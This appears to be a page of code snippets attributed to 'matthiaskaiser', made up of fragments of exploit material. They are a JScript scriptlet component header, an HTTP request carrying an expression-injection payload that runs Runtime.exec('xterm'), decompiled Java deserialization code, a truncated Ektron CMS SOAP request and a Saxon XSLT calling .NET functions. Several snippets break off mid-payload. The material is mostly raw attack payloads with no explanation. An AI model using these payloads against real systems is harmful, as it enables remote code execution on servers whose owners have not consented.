matthiaskaiser

<?xml version='1.0'?>
<package>
<component id='giffile'>
<registration
	description='Dummy'
	progid='giffile'
	version='1.00'
	remotable='True'>
</registration>
<script language='JScript'>

matthiaskaiser

POST /users HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 164

username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf

matthiaskaiser

/*     */   public Object readObject()
/*     */     throws ClassNotFoundException, IOException
/*     */   {
/*  91 */     int type = in.readByte();
/*     */     
/*  93 */     Object value = readObjectValue(type);
/*  94 */     return value;
/*     */   }
/*     */   
/*     */   protected Object readObjectValue(int type) throws ClassNotFoundException, IOException

matthiaskaiser

POST /Workarea/ServerControlWS.asmx HTTP/1.1
Host: xxxxx
Content-Type: text/xml; charset=utf-8
Content-Length: 880
SOAPAction: "http://www.ektron.com/CMS400/Webservice/ContentBlockEx"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <ContentBlockEx xmlns="http://www.ektron.com/CMS400/Webservice">

matthiaskaiser

<xsl:transform version="2.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:saxon="http://saxon.sf.net/">
  <xsl:output method="text"/>
  <xsl:template match="/">
    <xsl:text>asdf</xsl:text>
    <out xmlns:env="clitype:System.Environment" xmlns:os="clitype:System.OperatingSystem">
      <xsl:value-of select="env:Version()"/>
    </out>
    <xsl:text>asdf</xsl:text>